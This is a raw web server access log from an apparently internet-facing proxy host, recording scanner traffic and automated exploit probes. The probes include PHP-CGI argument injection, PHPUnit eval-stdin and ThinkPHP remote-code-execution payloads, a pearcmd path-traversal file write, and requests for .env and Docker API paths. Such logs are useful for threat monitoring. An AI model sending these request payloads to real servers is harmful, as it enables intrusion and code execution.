Keydrop.io/1.0(onlyscans.com/about);" "-" +[19/Jan/2026:20:29:06 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 23.94.162.106] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:20:35:14 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[19/Jan/2026:20:45:10 +0000] 400 - GET http 91.82.83.208 "/" [Client 66.132.153.116] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[19/Jan/2026:20:45:11 +0000] 400 - - http localhost "-" [Client 66.132.153.116] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:20:45:15 +0000] 400 - GET http 91.82.83.208 "/.well-known/security.txt" [Client 66.132.153.116] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[19/Jan/2026:20:48:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:20:52:20 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 167.86.80.125] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:20:52:20 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 167.86.80.125] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:20:52:20 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 167.86.80.125] [Length 154] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:20 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:52:21 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 167.86.80.125] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:20:58:07 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:21:14:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 92.63.197.197] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.2.5 (KHTML, like Gecko) Version/8.0.2 Safari/600.2.5" "-" +[19/Jan/2026:21:14:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 92.63.197.197] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:21:21:42 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:21:23:43 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 147.185.132.234] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[19/Jan/2026:21:43:57 +0000] 200 - GET http 192.168.100.43 "/" [Client 192.168.100.179] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0" "-" +[19/Jan/2026:21:43:58 +0000] 400 - GET http 192.168.100.43 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:21:49:36 +0000] 200 - GET http 91.82.83.208 "/" [Client 146.148.26.145] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[19/Jan/2026:21:54:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:21:56:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:22:07:14 +0000] 404 - GET http 91.82.83.208 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:22:19:34 +0000] 200 - GET http 91.82.83.208 "/" [Client 178.61.143.130] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115." "-" +[19/Jan/2026:22:20:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:22:23:57 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:22:34:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.157.172.39] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[19/Jan/2026:22:41:06 +0000] 200 - GET http 91.82.83.208 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[19/Jan/2026:22:49:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 167.94.138.184] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[19/Jan/2026:22:49:19 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.184] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:22:49:19 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[19/Jan/2026:22:49:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.184] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:22:49:45 +0000] 404 - GET http 91.82.83.208 "/security.txt" [Client 167.94.138.184] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[19/Jan/2026:22:49:49 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 167.94.138.184] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:22:53:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:23:09:39 +0000] 404 - GET http 91.82.83.208 "/frontend/.env" [Client 45.156.87.161] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[19/Jan/2026:23:16:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 82.29.53.106] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:23:20:27 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:23:21:05 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:23:24:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 146.190.103.103] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:23:24:14 +0000] 400 - - http localhost "-" [Client 157.245.204.205] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:23:24:14 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 146.190.103.103] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:23:24:21 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 196.196.53.42] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:23:24:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 45.132.194.8] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:23:26:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:23:31:24 +0000] 400 - GET https localhost "/" [Client 95.215.0.144] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:23:37:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:23:46:42 +0000] 404 - GET http 91.82.83.208 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[20/Jan/2026:00:00:45 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[20/Jan/2026:00:12:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:00:34:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:00:41:48 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:00:42:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.15] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:00:42:25 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 147.185.132.15] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:00:44:09 +0000] 400 - GET https localhost "/" [Client 94.102.49.155] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:00:49:18 +0000] 404 - GET http 91.82.83.208 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[20/Jan/2026:00:51:55 +0000] 404 - GET http 91.82.83.208 "/druid/index.html" [Client 20.163.15.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[20/Jan/2026:00:57:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:00:59:33 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:01:00:01 +0000] 404 - GET http 91.82.83.208 "/admin/config.php" [Client 91.232.238.112] [Length 150] [Gzip -] "xfa1" "-" +[20/Jan/2026:01:02:41 +0000] 404 - GET http 91.82.83.208 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:01:20:19 +0000] 404 - GET http 91.82.83.208 "/dispatch.asp" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:01:32:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 198.235.24.192] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[20/Jan/2026:01:34:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:01:35:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:01:38:12 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[20/Jan/2026:01:41:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[20/Jan/2026:01:43:21 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.157.142.101] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[20/Jan/2026:01:55:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:02:04:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 79.21.232.164] [Length 1033] [Gzip -] "-" "-" +[20/Jan/2026:02:09:12 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.134.148.59] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[20/Jan/2026:02:09:18 +0000] 400 - GET http 91.82.83.208 "/" [Client 3.134.148.59] [Length 654] [Gzip -] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[20/Jan/2026:02:10:33 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 82.29.53.106] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:02:11:16 +0000] 400 - - http localhost "-" [Client 3.134.148.59] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:02:15:26 +0000] 400 - - http localhost "-" [Client 3.134.148.59] [Length 0] [Gzip -] "-" "-" +[20/Jan/2026:02:18:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 71.6.232.22] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[20/Jan/2026:02:22:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:02:22:41 +0000] 200 - GET http 91.82.83.208 "/" [Client 35.203.210.9] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[20/Jan/2026:02:23:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 54.205.139.23] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36" "-" +[20/Jan/2026:02:23:44 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[20/Jan/2026:02:23:45 +0000] 200 - GET http 91.82.83.208 "/" [Client 44.199.14.68] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[20/Jan/2026:02:27:04 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[20/Jan/2026:02:27:29 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:02:37:02 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 YaBrowser/18.11.1.715 (beta) Yowser/2.5 Safari/537.36" "-" +[20/Jan/2026:02:40:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:02:42:31 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 204.76.203.6] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:03:09:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 82.29.53.106] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:03:09:48 +0000] 200 - GET http 91.82.83.208 "/" [Client 64.23.225.130] [Length 568] [Gzip 1.86] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[20/Jan/2026:03:09:49 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[20/Jan/2026:03:18:45 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 82.29.53.106] [Length 154] [Gzip -] "-" "-" +[20/Jan/2026:03:20:15 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:03:34:26 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[20/Jan/2026:03:45:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 82.29.53.106] [Length 154] 